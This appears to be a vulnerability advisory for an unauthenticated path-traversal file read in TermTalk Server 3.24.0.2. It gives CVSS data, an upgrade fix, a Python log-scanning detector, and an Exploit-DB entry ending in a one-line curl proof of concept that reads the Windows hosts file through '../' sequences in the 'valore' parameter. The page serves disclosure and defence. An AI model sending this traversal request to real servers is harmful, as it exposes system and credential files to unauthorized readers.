Vendor: TermTalk Server
By: Fabiano Golluscio
CVSS: 8.8 (HIGH)
Type: Arbitrary File Read
CWE: 22
Product Name: TermTalk Server
Affected Version From: 3.24.0.2
Affected Version To: 3.26.1.7
Patch Exists: YES
CPE: a:solari_di_udine:termtalk_server
2022

TermTalk Server 3.24.0.2 – Arbitrary File Read (Unauthenticated)

TermTalk Server 3.24.0.2 is vulnerable to an unauthenticated arbitrary file read. An attacker can read any file on the system by sending a crafted HTTP request to the ‘/file’ endpoint with the ‘valore’ parameter set to the path of the file to be read. The server honours directory traversal sequences in that parameter: for example, a request to ‘/file?valore=../../../../WINDOWS/System32/drivers/etc/hosts’ returns the contents of the ‘hosts’ file.

Mitigation:

Upgrade to TermTalk Server 3.26.1.7 or later.
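
For reviewing access logs of servers that ran an affected version, the following is an added example (not part of the original advisory or the vendor's code) that flags requests to the ‘/file’ endpoint whose ‘valore’ parameter contains ‘..’ path segments after decoding. The log format (common log style) and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a common-log-style access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly so layered encoding is normalised before matching."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True if the decoded value contains a '..' path segment (either slash style)."""
    segments = decode_fully(value).replace("\\", "/").split("/")
    return ".." in segments

def suspicious_requests(log_lines):
    """Return (line_number, decoded valore) for /file requests carrying traversal."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if url.path.rstrip("/") != "/file":
            continue  # only the endpoint named in the advisory
        for raw in parse_qs(url.query, keep_blank_values=True).get("valore", []):
            if is_traversal(raw):
                hits.append((n, decode_fully(raw)))
    return hits

# Constructed sample log lines (documentation IP ranges), not captured traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [03/Jan/2022:10:00:01 +0000] "GET /file?valore=report.txt HTTP/1.1" 200 512',
    '203.0.113.9 - - [03/Jan/2022:10:00:05 +0000] "GET /file?valore=../../../../WINDOWS/System32/drivers/etc/hosts HTTP/1.1" 200 824',
    '203.0.113.9 - - [03/Jan/2022:10:00:09 +0000] "GET /file?valore=..%2F..%2F..%2F..%2FWINDOWS%2FSystem32%2Fdrivers%2Fetc%2Fhosts HTTP/1.1" 200 824',
    '198.51.100.7 - - [03/Jan/2022:10:00:12 +0000] "GET /index.html?valore=../x HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for line_no, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {line_no}: valore={value!r}")
```

A hit with a 200 status and a non-trivial response size is worth following up, since it suggests file contents were returned rather than an error.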

Exploit-DB raw data:

# Exploit Title: TermTalk Server 3.24.0.2 - Arbitrary File Read (Unauthenticated)
# Date: 03/01/2022
# Exploit Author: Fabiano Golluscio @ Swascan
# Vendor Homepage: https://www.solari.it/it/
# Software Link: https://www.solari.it/it/solutions/other-solutions/access-control/
# Version: 3.24.0.2
# Fixed Version: 3.26.1.7
# Reference: https://www.swascan.com/solari-di-udine/

POC

curl "http://url:port/file?valore=../../../../WINDOWS/System32/drivers/etc/hosts"